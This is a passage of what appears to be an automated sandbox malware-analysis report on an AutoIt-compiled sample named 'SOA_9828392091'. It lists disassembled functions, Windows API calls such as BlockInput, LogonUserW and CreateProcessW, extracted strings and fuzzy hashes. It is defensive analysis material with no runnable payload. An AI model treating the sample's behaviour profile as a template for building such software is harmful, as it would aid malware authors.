                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 9ef7581ec4f812f4207f52f461f1728ccd80fbaeaa4f9e8eae73a1f6be9d8dfc
                                      • Instruction ID: 87f42a7f479437b7c0bf0bd2fa6ac12c789eb5bd81d104b45c300e3a86a5c3b7
                                      • Opcode Fuzzy Hash: 9ef7581ec4f812f4207f52f461f1728ccd80fbaeaa4f9e8eae73a1f6be9d8dfc
                                      • Instruction Fuzzy Hash: 0C01D471608118ABDF149F28DC4ABF93BAAEFC6324F044125FA5957192C335AC20D7E0
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0099E9F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$CallLongProc
                                      • String ID:
                                      • API String ID: 4084987330-0
                                      • Opcode ID: f79dba930dfeabb2560ebe46e84291f303308b85166c2643678cc9fb6ffd8102
                                      • Instruction ID: d4aa4e3ca131a2ce5edbc26b3ca862ec3198b3f7a843d8102fb5be809badb957
                                      • Opcode Fuzzy Hash: f79dba930dfeabb2560ebe46e84291f303308b85166c2643678cc9fb6ffd8102
                                      • Instruction Fuzzy Hash: 39F03735104108EFCF15DF98EC00DB93BAAEB48320B048514FA159B2A1CB72ECA0EB90
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,009AE514,?,?,?,?,?,00000001,?), ref: 0099ECCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                      • String ID:
                                      • API String ID: 2356834413-0
                                      • Opcode ID: c8c649c25218aaa6257f20a05e573a0a04f5337576beb80967f2a5c07f2b8ef2
                                      • Instruction ID: 10095027518c5c322a4dfd04be9233e0800afa279aa3257f8b7831b0aa801ca3
                                      • Opcode Fuzzy Hash: c8c649c25218aaa6257f20a05e573a0a04f5337576beb80967f2a5c07f2b8ef2
                                      • Instruction Fuzzy Hash: 34F0EC30200228EBDF149F09DC06EBE3B55EF00760F004415F9451A2D1D7769C70EBD0
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 0094AB45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: a09d4e0cf2115a202c1583122c546e709c907f16e877a84da7547340e80bc8e8
                                      • Instruction ID: 6c9b9b98453a53dd3fa046d85e4b5baec8b915365df0f14d5177f6a746ea9957
                                      • Opcode Fuzzy Hash: a09d4e0cf2115a202c1583122c546e709c907f16e877a84da7547340e80bc8e8
                                      • Instruction Fuzzy Hash: 35F08C30614209DFDF289F09EC19E393BA6FB44360F04421AF9128B2A0E772D860EB90
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00986ACA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 7e6ec6668c0b77762cd4c18a3e56030dcbbc946d09153c86d212804df20c09e8
                                      • Instruction ID: 4ef5e3bb5732bef13f4c60b5a303984b1bc46f1625b0660d40ef133de84cbc2f
                                      • Opcode Fuzzy Hash: 7e6ec6668c0b77762cd4c18a3e56030dcbbc946d09153c86d212804df20c09e8
                                      • Instruction Fuzzy Hash: 6CE04835210204AFC700EF59D404E56B7ECAFB4751F04C456F945DB351DAB4F8048BA0
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009774DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: d9d2fef0e3fb52489f0f596747a90fa76998d2fe073863647098165878b2fdf5
                                      • Instruction ID: 97db2fba5a4c336231417a1c588ae795e29d3f8e390d556515d30047872be211
                                      • Opcode Fuzzy Hash: d9d2fef0e3fb52489f0f596747a90fa76998d2fe073863647098165878b2fdf5
                                      • Instruction Fuzzy Hash: 97D05EA312C70538EC3807A48C0FF76890EF3007C4F80D6C9B28AC90E1B8C45801A032
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0099F649
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 44fb98c9ff14617a40fa47bebb099b85b5953c303e23528a0b8cf43e615b6dd7
                                      • Instruction ID: 148531798e4a2d235f2d0158e06592eefdf82b5f2201c0f244e72f1162ed45cc
                                      • Opcode Fuzzy Hash: 44fb98c9ff14617a40fa47bebb099b85b5953c303e23528a0b8cf43e615b6dd7
                                      • Instruction Fuzzy Hash: 69F06D31205389AFDF21EF58DC15FD67B99EB16720F144009BA11672E1CBB07820EBA0
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0094AB7D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 2065330234-0
                                      • Opcode ID: 61a1dfd3d3ee9dd27dc6e56c86bd9ae54f9c1145e3f8fb750b66c0f5fd06f5a5
                                      • Instruction ID: 536af39d2c54500f6edb48c86423e973a7931d4ab0292f57feeaa4a367f3efdb
                                      • Opcode Fuzzy Hash: 61a1dfd3d3ee9dd27dc6e56c86bd9ae54f9c1145e3f8fb750b66c0f5fd06f5a5
                                      • Instruction Fuzzy Hash: 4EE01235645308FBCF25AF91DC11F683B2AEF88324F104058F6054B2A1CB73A522EB50
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0096AD3E), ref: 0096B124
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: bba930517657330b89276801f28906bbc36312c0ac93d0c608ca0728ea7333da
                                      • Instruction ID: ad62024a9d114a0f32e455b9e5c2738b5bf624f462f8e7c474e2b516fa9501b0
                                      • Opcode Fuzzy Hash: bba930517657330b89276801f28906bbc36312c0ac93d0c608ca0728ea7333da
                                      • Instruction Fuzzy Hash: A7D05E320A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA11C50A0C671D531AB50
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,009AE4D1,?,?,?,?,?,?), ref: 0099F67F
                                        • Part of subcall function 0099E32E: _memset.LIBCMT ref: 0099E33D
                                        • Part of subcall function 0099E32E: _memset.LIBCMT ref: 0099E34C
                                        • Part of subcall function 0099E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F3D00,009F3D44), ref: 0099E37B
                                        • Part of subcall function 0099E32E: CloseHandle.KERNEL32 ref: 0099E38D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                      • String ID:
                                      • API String ID: 2364484715-0
                                      • Opcode ID: 1c540426a93a072787839dbed4f6769c71134ab33bf78d9ff8dd0548d9af05f0
                                      • Instruction ID: 8f79604027b4325f457761cbadf32329e70deb8fd9fb108e44d713e366770f19
                                      • Opcode Fuzzy Hash: 1c540426a93a072787839dbed4f6769c71134ab33bf78d9ff8dd0548d9af05f0
                                      • Instruction Fuzzy Hash: DCE04632114209DFCF01DF08DD15E9937B9EB08328F014115FA00872B1C731AC60EF40
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL ref: 0099F5D0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: fc9bf19b5da4b4142f81aa3252b9a4158b03035c64bc56f720e09ff4454fde7e
                                      • Instruction ID: 180d42d0a017eb154fb146bc20f7e8241442c7b352c63c8641c03cc140a0a41d
                                      • Opcode Fuzzy Hash: fc9bf19b5da4b4142f81aa3252b9a4158b03035c64bc56f720e09ff4454fde7e
                                      • Instruction Fuzzy Hash: A1E0173420820DEFCB01DF84DC44E963BA5EB19324F010054FD048B361D771A830EBA1
                                      APIs
                                      • NtdllDialogWndProc_W.NTDLL ref: 0099F5FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_
                                      • String ID:
                                      • API String ID: 3239928679-0
                                      • Opcode ID: 9c1dfe11565a1928301b2382b4970a96085fe8e8ecdc522fa310f8bfbbcdbf7c
                                      • Instruction ID: 807cdeab1b4bed285030285a74fa8b1fd6dbdea7681abb5ea8f1f9475526d406
                                      • Opcode Fuzzy Hash: 9c1dfe11565a1928301b2382b4970a96085fe8e8ecdc522fa310f8bfbbcdbf7c
                                      • Instruction Fuzzy Hash: 6AE0173420420DEFCB01DF84DC44E963BA5FB19324F010054FD048B362C772A870EBA1
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                        • Part of subcall function 0094B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0094B72B), ref: 0094B7F6
                                        • Part of subcall function 0094B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0094B72B,00000000,?,?,0094B2EF,?,?), ref: 0094B88D
                                      • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0094B2EF,?,?), ref: 0094B734
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                      • String ID:
                                      • API String ID: 2797419724-0
                                      • Opcode ID: 803b280eacf241751038db19e9eb429cdb16e9a4768996592339fa5d923f3756
                                      • Instruction ID: 9d8eababec930926fdc747384d8fba9de06759fcba3911f2f7d7c5edbb3ffc3e
                                      • Opcode Fuzzy Hash: 803b280eacf241751038db19e9eb429cdb16e9a4768996592339fa5d923f3756
                                      • Instruction Fuzzy Hash: 30D0123014530CB7DF202F51DE07F593A5E9B90750F004410B704691D1CBB1A51096A4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0095818F
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • API ID: Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 3728558374-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 0098A2FE
                                      • DeleteObject.GDI32(00000000), ref: 0098A310
                                      • DestroyWindow.USER32 ref: 0098A31E
                                      • GetDesktopWindow.USER32 ref: 0098A338
                                      • GetWindowRect.USER32(00000000), ref: 0098A33F
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0098A480
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0098A490
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A4D8
                                      • GetClientRect.USER32(00000000,?), ref: 0098A4E4
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0098A51E
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A540
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A553
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A55E
                                      • GlobalLock.KERNEL32(00000000), ref: 0098A567
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A576
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0098A57F
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A586
                                      • GlobalFree.KERNEL32(00000000), ref: 0098A591
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0098A5A3
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009BD9BC,00000000), ref: 0098A5B9
                                      • GlobalFree.KERNEL32(00000000), ref: 0098A5C9
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0098A5EF
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0098A60E
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A630
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A81D
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0099D2DB
                                      • GetSysColorBrush.USER32(0000000F), ref: 0099D30C
                                      • GetSysColor.USER32(0000000F), ref: 0099D318
                                      • SetBkColor.GDI32(?,000000FF), ref: 0099D332
                                      • SelectObject.GDI32(?,00000000), ref: 0099D341
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0099D36C
                                      • GetSysColor.USER32(00000010), ref: 0099D374
                                      • CreateSolidBrush.GDI32(00000000), ref: 0099D37B
                                      • FrameRect.USER32(?,?,00000000), ref: 0099D38A
                                      • DeleteObject.GDI32(00000000), ref: 0099D391
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0099D3DC
                                      • FillRect.USER32(?,?,00000000), ref: 0099D40E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0099D439
                                        • Part of subcall function 0099D575: GetSysColor.USER32(00000012), ref: 0099D5AE
                                        • Part of subcall function 0099D575: SetTextColor.GDI32(?,?), ref: 0099D5B2
                                        • Part of subcall function 0099D575: GetSysColorBrush.USER32(0000000F), ref: 0099D5C8
                                        • Part of subcall function 0099D575: GetSysColor.USER32(0000000F), ref: 0099D5D3
                                        • Part of subcall function 0099D575: GetSysColor.USER32(00000011), ref: 0099D5F0
                                        • Part of subcall function 0099D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099D5FE
                                        • Part of subcall function 0099D575: SelectObject.GDI32(?,00000000), ref: 0099D60F
                                        • Part of subcall function 0099D575: SetBkColor.GDI32(?,00000000), ref: 0099D618
                                        • Part of subcall function 0099D575: SelectObject.GDI32(?,?), ref: 0099D625
                                        • Part of subcall function 0099D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0099D644
                                        • Part of subcall function 0099D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099D65B
                                        • Part of subcall function 0099D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0099D670
                                        • Part of subcall function 0099D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099D698
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 3521893082-0
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097DBD6
                                      • GetDriveTypeW.KERNEL32(?,009CDC54,?,\\.\,009CDC00), ref: 0097DCC3
                                      • SetErrorMode.KERNEL32(00000000,009CDC54,?,\\.\,009CDC00), ref: 0097DE29
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 039ef878f02530bc9b1e13fafbcd4afe42726ec52cc4debda40e47e61b8b3b22
                                      • Instruction ID: f4b7116062ebdc51c37672bf4caed7dae24634de22803de184b86f1939a37600
                                      • Opcode Fuzzy Hash: 039ef878f02530bc9b1e13fafbcd4afe42726ec52cc4debda40e47e61b8b3b22
                                      • Instruction Fuzzy Hash: A051E232209742AB8321DF11CA86A39B7B0FFD4308F28D919F46B9B6D1DB60DD45DB42
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: ef95e31636fca0e808a19e85f27ed7956be82baf86355fdc511922c536b815f5
                                      • Instruction ID: fbac96408e4324fa3e7dc9fa63d98e14e6d44fc4788367eb03608ce60dbd53c8
                                      • Opcode Fuzzy Hash: ef95e31636fca0e808a19e85f27ed7956be82baf86355fdc511922c536b815f5
                                      • Instruction Fuzzy Hash: 8C81F7B1640605BBCB25AB64DC82FBB777CAF96304F044439F906BA1C2EB60D945CBD1
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0099C788
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0099C83E
                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 0099C859
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0099CB15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: 0
                                      • API String ID: 2326795674-4108050209
                                      • Opcode ID: cce04c225cc6d8cc180cec63abb7823e6f982b604ac28b181eac40d277935c04
                                      • Instruction ID: ccd03cfee3b5aa9e7e4858a5c42c5b7cb1678e0b481d5be1ffc49ed0299c7972
                                      • Opcode Fuzzy Hash: cce04c225cc6d8cc180cec63abb7823e6f982b604ac28b181eac40d277935c04
                                      • Instruction Fuzzy Hash: 5DF1E6B1509301AFEB218F2CCC45BAABBE8FF49354F080A2DF599D62A1D774D940DB91
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,009CDC00), ref: 00996449
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 3964851224-45149045
                                      • Opcode ID: 9191ced86f28146b296069c62e08399fbbe53f6a7e7c01bb3e8ecbe43c7f215e
                                      • Instruction ID: b3cd57f538e19f2877273effd4b31347fbe3882d7b1f49091ce2bc4c89c0033e
                                      • Opcode Fuzzy Hash: 9191ced86f28146b296069c62e08399fbbe53f6a7e7c01bb3e8ecbe43c7f215e
                                      • Instruction Fuzzy Hash: 42C17D306043458BCF14EF58C591FAE77E5BFD5344F044869F8869B2A2EB25ED4ACB82
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0099D5AE
                                      • SetTextColor.GDI32(?,?), ref: 0099D5B2
                                      • GetSysColorBrush.USER32(0000000F), ref: 0099D5C8
                                      • GetSysColor.USER32(0000000F), ref: 0099D5D3
                                      • CreateSolidBrush.GDI32(?), ref: 0099D5D8
                                      • GetSysColor.USER32(00000011), ref: 0099D5F0
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099D5FE
                                      • SelectObject.GDI32(?,00000000), ref: 0099D60F
                                      • SetBkColor.GDI32(?,00000000), ref: 0099D618
                                      • SelectObject.GDI32(?,?), ref: 0099D625
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0099D644
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099D65B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0099D670
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099D698
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0099D6BF
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0099D6DD
                                      • DrawFocusRect.USER32(?,?), ref: 0099D6E8
                                      • GetSysColor.USER32(00000011), ref: 0099D6F6
                                      • SetTextColor.GDI32(?,00000000), ref: 0099D6FE
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0099D712
                                      • SelectObject.GDI32(?,0099D2A5), ref: 0099D729
                                      • DeleteObject.GDI32(?), ref: 0099D734
                                      • SelectObject.GDI32(?,?), ref: 0099D73A
                                      • DeleteObject.GDI32(?), ref: 0099D73F
                                      • SetTextColor.GDI32(?,?), ref: 0099D745
                                      • SetBkColor.GDI32(?,?), ref: 0099D74F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
